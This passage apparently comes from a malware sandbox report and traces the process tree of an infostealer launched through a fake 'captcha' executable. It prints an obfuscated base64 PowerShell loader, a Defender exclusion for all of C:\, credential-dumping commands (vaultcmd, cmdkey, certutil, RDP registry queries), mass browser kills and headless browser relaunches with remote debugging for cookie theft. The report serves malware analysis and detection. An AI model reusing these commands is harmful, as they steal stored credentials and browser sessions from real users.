JHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2748
    - - C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3420
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2194519399.txt\""
        6⤵
        NTFS ADS
        
        PID:2976
      - C:\Windows\system32\net.exe
        
        "net" statistics workstation
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5784
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 statistics workstation
        7⤵
        
        PID:1676
      - C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        6⤵
        
        PID:1900
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5368
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FO CSV /NH
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4256
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        6⤵
        
        PID:5892
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5344
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        7⤵
        
        PID:5468
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4688
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4432
      - C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        6⤵
        
        PID:4664
      - C:\Windows\system32\certutil.exe
        
        "certutil" -store -user My
        6⤵
        
        PID:3300
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:624
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4604
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5780
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3168
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3084
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5456
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
        6⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5476
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6048
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        6⤵
        
        PID:5276
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list:TERMSRV/69.48.201.74
        6⤵
        
        PID:4408
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3516
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2172
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2168
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4532
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM msedge.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2584
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM brave.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1500
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2740
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM opera.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1324
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM Discord.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4488
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM vivaldi.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3616
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordCanary.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4896
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM firefox.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4432
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordPTB.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4832
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM dragon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:832
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordDevelopment.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM maxthon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5832
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM uc_browser.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5912
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM slimjet.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5088
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM cent_browser.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2576
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM epic.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2984
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM torch.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5956
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM whale.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM 360browser.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5276
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM qqbrowser.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5800
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM browser.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        6⤵
        
        PID:1996
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:4928
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM brave.exe
        6⤵
        
        PID:1136
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM opera.exe
        6⤵
        Kills process with taskkill
        
        PID:4500
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM vivaldi.exe
        6⤵
        
        PID:6088
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM firefox.exe
        6⤵
        
        PID:2148
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM dragon.exe
        6⤵
        Kills process with taskkill
        
        PID:2944
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM maxthon.exe
        6⤵
        Kills process with taskkill
        
        PID:5880
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM uc_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:1292
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM slimjet.exe
        6⤵
        Kills process with taskkill
        
        PID:3284
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM cent_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:5044
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM epic.exe
        6⤵
        Kills process with taskkill
        
        PID:4664
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM torch.exe
        6⤵
        Kills process with taskkill
        
        PID:2328
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM whale.exe
        6⤵
        Kills process with taskkill
        
        PID:2448
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM 360browser.exe
        6⤵
        Kills process with taskkill
        
        PID:1928
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM qqbrowser.exe
        6⤵
        
        PID:3088
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM browser.exe
        6⤵
        Kills process with taskkill
        
        PID:452
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:5628
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=44725 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
        6⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffedcdfdcf8,0x7ffedcdfdd04,0x7ffedcdfdd10
        7⤵
        
        PID:6060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2432,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2424 /prefetch:2
        7⤵
        Modifies registry class
        
        PID:2584
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2836,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2676 /prefetch:3
        7⤵
        
        PID:4452
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=3188,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3180 /prefetch:8
        7⤵
        
        PID:2004
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44725 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3676,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3668 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4500
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44725 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3984,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3276 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:1676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44725 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3796,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3792 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2276
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4596,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4592 /prefetch:8
        7⤵
        
        PID:5360
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:2072
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:4540
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=46919 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
        6⤵
        Uses browser remote debugging
        
        PID:3656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=46919 --remote-allow-origins=* --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --edge-skip-compat-layer-relaunch
        7⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:6056
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x22c,0x230,0x234,0x228,0x23c,0x7ffeda14f208,0x7ffeda14f214,0x7ffeda14f220
        8⤵
        
        PID:6012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2224,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:2
        8⤵
        Modifies registry class
        
        PID:6224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2668,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2964 /prefetch:3
        8⤵
        
        PID:6372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3216,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3208 /prefetch:8
        8⤵
        
        PID:6388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=46919 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6416
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=46919 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=4012,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4872,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8
        8⤵
        
        PID:6848
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4984,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:8
        8⤵
        
        PID:6856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5508,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8
        8⤵
        
        PID:7108
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5508,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8
        8⤵
        
        PID:7148
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:5128
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        6⤵
        
        PID:2004
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:3592
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:5952
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM brave.exe
        6⤵
        
        PID:916
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM opera.exe
        6⤵
        Kills process with taskkill
        
        PID:2276
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM vivaldi.exe
        6⤵
        
        PID:2692
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM firefox.exe
        6⤵
        Kills process with taskkill
        
        PID:2996
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM dragon.exe
        6⤵
        Kills process with taskkill
        
        PID:6244
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM maxthon.exe
        6⤵
        Kills process with taskkill
        
        PID:6320
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM uc_browser.exe
        6⤵
        
        PID:7448
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM slimjet.exe
